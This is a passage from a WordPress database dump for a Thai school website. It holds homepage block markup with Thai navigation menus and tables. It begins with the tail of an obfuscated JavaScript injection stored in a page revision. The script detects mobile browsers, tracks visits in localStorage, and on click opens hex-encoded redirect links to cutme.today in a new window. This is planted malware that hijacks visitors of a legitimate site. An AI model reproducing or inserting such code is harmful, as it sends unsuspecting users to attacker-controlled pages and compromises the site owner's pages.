)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:09:07','2024-07-27 05:09:07','',14,'http://pakhaeng.ssk.in.th/?p=134',0,'revision','',0),
(136,1,'2024-07-27 12:09:53','2024-07-27 05:09:53','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 